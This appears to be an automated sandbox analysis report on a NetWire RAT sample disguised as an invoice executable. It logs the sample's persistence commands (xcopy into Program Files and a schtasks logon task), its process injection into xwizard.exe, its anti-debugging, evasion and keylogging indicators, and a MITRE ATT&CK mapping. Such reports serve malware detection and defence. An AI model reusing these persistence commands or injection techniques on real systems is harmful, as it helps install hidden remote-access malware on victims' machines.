Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q	Jump to behavior
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f	Jump to behavior
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\xwizard.exe C:\Windows\System32\xwizard.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "%ProgramFiles%\Security\" /y /i /c /q	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc ONLOGON /tn "Security" /tr "%ProgramFiles%\Security\important invoice presentation nov 2021.exe" /it /f	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\xwizard.exe C:\Windows\System32\xwizard.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f	Jump to behavior

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@26/2@1/1

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00C00C4D CoInitialize,CoCreateInstance,

13_2_00C00C4D

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00406084 SetErrorMode,GetLogicalDriveStringsA,GetVolumeInformationA,GetDiskFreeSpaceExA,GetDriveTypeA,

14_2_00406084

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00402570 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

14_2_00402570

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3132:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_01
Source: C:\Windows\SysWOW64\xwizard.exe	Mutant created: \Sessions\1\BaseNamedObjects\wAnRkHLX

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00BAC0F7 __EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,

13_2_00BAC0F7

Source: C:\Windows\SysWOW64\xcopy.exe

File created: C:\Program Files (x86)\Security

Jump to behavior

Source: C:\Windows\SysWOW64\xwizard.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: important invoice presentation nov 2021.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: important invoice presentation nov 2021.exe

Static file information: File size 3391296 > 1048576

Source: important invoice presentation nov 2021.exe

Static PE information: certificate valid

Source: important invoice presentation nov 2021.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x22cc00

Source: important invoice presentation nov 2021.exe

Static PE information: More than 200 imports for USER32.dll

Source: important invoice presentation nov 2021.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: important invoice presentation nov 2021.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: important invoice presentation nov 2021.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: important invoice presentation nov 2021.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: important invoice presentation nov 2021.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: important invoice presentation nov 2021.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: important invoice presentation nov 2021.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: important invoice presentation nov 2021.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: important invoice presentation nov 2021.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: important invoice presentation nov 2021.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: important invoice presentation nov 2021.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: important invoice presentation nov 2021.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: important invoice presentation nov 2021.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00D5A1ED push ecx; ret	13_2_00D5A20E
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BB061B push 8B00DBECh; retf	13_2_00BB0620
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BB0607 push 8B00DBECh; retf	13_2_00BB060C
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BB0739 push 8B00DBECh; iretd	13_2_00BB073E
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BB0702 push 8B00DBECh; iretd	13_2_00BB0707
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h	14_2_0040DD9F
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah	14_2_0040DDD9
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h	14_2_0040DDF7
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040DCE9 push edx; mov dword ptr [esp], esi	14_2_0040E394
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040A4BC push esi; mov dword ptr [esp], 00423347h	14_2_0040A543
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00409953 push edi; mov dword ptr [esp], 00000091h	14_2_00409980
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00409953 push ebp; mov dword ptr [esp], 00000090h	14_2_0040998D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00411D8C push edx; mov dword ptr [esp], edi	14_2_00412058
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00409E61 push eax; mov dword ptr [esp], ebx	14_2_00409FDE
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406E04 push ecx; mov dword ptr [esp], ebx	14_2_00406E69
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040262F push edx; mov dword ptr [esp], edi	14_2_004027C8
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040262F push edx; mov dword ptr [esp], edi	14_2_00402815
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040262F push edx; mov dword ptr [esp], edi	14_2_004029B2
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_004146E1 push eax; mov dword ptr [esp], ebx	14_2_0041470B
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040970C push eax; mov dword ptr [esp], 0042B4A0h	14_2_004097B9
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h	30_2_0040DD9F
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah	30_2_0040DDD9
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h	30_2_0040DDF7
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040DCE9 push edx; mov dword ptr [esp], esi	30_2_0040E394
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040A4BC push esi; mov dword ptr [esp], 00423347h	30_2_0040A543
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00409953 push edi; mov dword ptr [esp], 00000091h	30_2_00409980
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00409953 push ebp; mov dword ptr [esp], 00000090h	30_2_0040998D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00411D8C push edx; mov dword ptr [esp], edi	30_2_00412058
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00409E61 push eax; mov dword ptr [esp], ebx	30_2_00409FDE
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406E04 push ecx; mov dword ptr [esp], ebx	30_2_00406E69
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040262F push edx; mov dword ptr [esp], edi	30_2_004027C8

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00408417 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,malloc,malloc,malloc,LoadLibraryA,GetProcAddress,malloc,malloc,malloc,malloc,

14_2_00408417

Persistence and Installation Behavior:

Source: C:\Windows\SysWOW64\xcopy.exe

File created: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory written: PID: 5612 base: CC13DB value: E9 4D 10 74 FF	Jump to behavior
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory written: PID: 5612 base: 11E4EF0 value: E9 43 B8 AD FF	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory written: PID: 2040 base: CC13DB value: E9 4D 10 74 FF	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory written: PID: 2040 base: 11E4EF0 value: E9 43 B8 AD FF	Jump to behavior

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00BE6783 IsWindowVisible,IsIconic,

13_2_00BE6783

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Windows\SysWOW64\xwizard.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_14-9461
Source: C:\Windows\SysWOW64\xwizard.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_30-9272

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Windows\SysWOW64\xwizard.exe

Stalling execution: Execution stalls by calling Sleep

graph_14-9374

Source: C:\Windows\SysWOW64\xwizard.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_30-9471

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\xwizard.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\xwizard.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_14-9535

Source: C:\Windows\SysWOW64\xwizard.exe	API coverage: 7.6 %
Source: C:\Windows\SysWOW64\xwizard.exe	API coverage: 3.1 %

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00D7216B VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

13_2_00D7216B

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00BD655F __EH_prolog3_GS,GetFullPathNameA,__cftof,_strlen,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,_strlen,	13_2_00BD655F
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406453 MultiByteToWideChar,SetErrorMode,FindFirstFileW,FileTimeToSystemTime,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	14_2_00406453
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040680D SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,FindNextFileW,	14_2_0040680D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040753D MultiByteToWideChar,SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,MultiByteToWideChar,wcscat,WideCharToMultiByte,FindNextFileW,	14_2_0040753D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00413A85 SetErrorMode,MultiByteToWideChar,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	14_2_00413A85
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_0040DB1C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,	14_2_0040DB1C
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406F83 SetErrorMode,FindFirstFileA,strcmp,strcmp,strcat,fopen,strncpy,fclose,strcpy,FindNextFileA,FindClose,	14_2_00406F83
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 14_2_00406390 FindFirstFileW,fopen,_snwprintf,fwprintf,_snwprintf,FindNextFileW,FindClose,fclose,	14_2_00406390
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406453 MultiByteToWideChar,SetErrorMode,FindFirstFileW,FileTimeToSystemTime,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	30_2_00406453
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040680D SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,FindNextFileW,	30_2_0040680D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040753D MultiByteToWideChar,SetErrorMode,MultiByteToWideChar,wcscat,FindFirstFileW,FindClose,WideCharToMultiByte,MultiByteToWideChar,wcscat,WideCharToMultiByte,FindNextFileW,	30_2_0040753D
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00413A85 SetErrorMode,MultiByteToWideChar,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,FindNextFileW,FindClose,	30_2_00413A85
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_0040DB1C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,	30_2_0040DB1C
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406F83 SetErrorMode,FindFirstFileA,strcmp,strcmp,strcat,fopen,strncpy,fclose,strcpy,FindNextFileA,FindClose,	30_2_00406F83
Source: C:\Windows\SysWOW64\xwizard.exe	Code function: 30_2_00406390 FindFirstFileW,fopen,_snwprintf,fwprintf,_snwprintf,FindNextFileW,FindClose,fclose,	30_2_00406390

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00406084 SetErrorMode,GetLogicalDriveStringsA,GetVolumeInformationA,GetDiskFreeSpaceExA,GetDriveTypeA,

14_2_00406084

Source: C:\Windows\SysWOW64\xwizard.exe	API call chain: ExitProcess graph end node	graph_14-9283
Source: C:\Windows\SysWOW64\xwizard.exe	API call chain: ExitProcess graph end node	graph_14-9235
Source: C:\Windows\SysWOW64\xwizard.exe	API call chain: ExitProcess graph end node	graph_30-9179

Source: xwizard.exe, 0000001E.00000002.688604583.00000000010A8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: xwizard.exe, 0000000E.00000002.864002557.0000000000F38000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00D680C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_00D680C8

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00D7216B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

13_2_00D7216B

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00BAACF6 OutputDebugStringA,GetLastError,

13_2_00BAACF6

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_00408417 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,malloc,malloc,malloc,LoadLibraryA,GetProcAddress,malloc,malloc,malloc,malloc,

14_2_00408417

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00BC23F6 GetProcessHeap,

13_2_00BC23F6

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00D9085C mov eax, dword ptr fs:[00000030h]

13_2_00D9085C

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00D680C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		13_2_00D680C8
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Code function: 13_2_00D5A5D4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		13_2_00D5A5D4

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Section loaded: unknown target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Section loaded: unknown target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: B4B008	Jump to behavior
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: CC0000	Jump to behavior
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: CC13DB	Jump to behavior
Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: 11E4EF0	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: BBD008	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: CC0000	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: CC13DB	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory written: C:\Windows\SysWOW64\xwizard.exe base: 11E4EF0	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Memory allocated: C:\Windows\SysWOW64\xwizard.exe base: CC0000 protect: page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Memory allocated: C:\Windows\SysWOW64\xwizard.exe base: CC0000 protect: page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_004121C0 keybd_event,

14_2_004121C0

Source: C:\Users\user\Desktop\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\xwizard.exe C:\Windows\System32\xwizard.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Users\user\Desktop\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f	Jump to behavior
Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe	Process created: C:\Windows\SysWOW64\xwizard.exe C:\Windows\System32\xwizard.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" "C:\Program Files (x86)\Security\" /y /i /c /q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc ONLOGON /tn "Security" /tr "C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe" /it /f	Jump to behavior

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_004121EF SetCursorPos,mouse_event,

14_2_004121EF

Source: xwizard.exe, 0000000E.00000002.863923152.0000000000C94000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: xwizard.exe, 0000000E.00000002.864740086.0000000003980000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: xwizard.exe, 0000000E.00000002.864740086.0000000003980000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: xwizard.exe, 0000000E.00000002.863923152.0000000000C94000.00000004.00000001.sdmp	Binary or memory string: Program Manager"
Source: xwizard.exe, 0000000E.00000002.864740086.0000000003980000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: xwizard.exe, 0000000E.00000002.864740086.0000000003980000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00D5A3F4 cpuid

13_2_00D5A3F4

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00D5A7D1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

13_2_00D5A7D1

Source: C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe

Code function: 13_2_00BE3003 __EH_prolog3_GS,GetVersionExA,__cftof,_strlen,CoInitializeEx,CoCreateInstance,

13_2_00BE3003

Source: C:\Windows\SysWOW64\xwizard.exe

Code function: 14_2_004130E8 GetUserNameW,WideCharToMultiByte,

14_2_004130E8

Remote Access Functionality:

Yara detected NetWire RAT

Show sources

Source: Yara match	File source: 1.2.important invoice presentation nov 2021.exe.1c8f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.xwizard.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.important invoice presentation nov 2021.exe.1cf00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.xwizard.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507835553.000000001C8F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.683551594.000000001CF00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: important invoice presentation nov 2021.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: important invoice presentation nov 2021.exe PID: 2872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xwizard.exe PID: 5612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xwizard.exe PID: 2040, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API11	Scheduled Task/Job1	Process Injection312	Disable or Modify Tools1	Credential API Hooking1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Deobfuscate/Decode Files or Information1	Input Capture121	Account Discovery1	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Credential API Hooking1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	System Information Discovery15	Distributed Component Object Model	Input Capture121	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery31	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection312	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
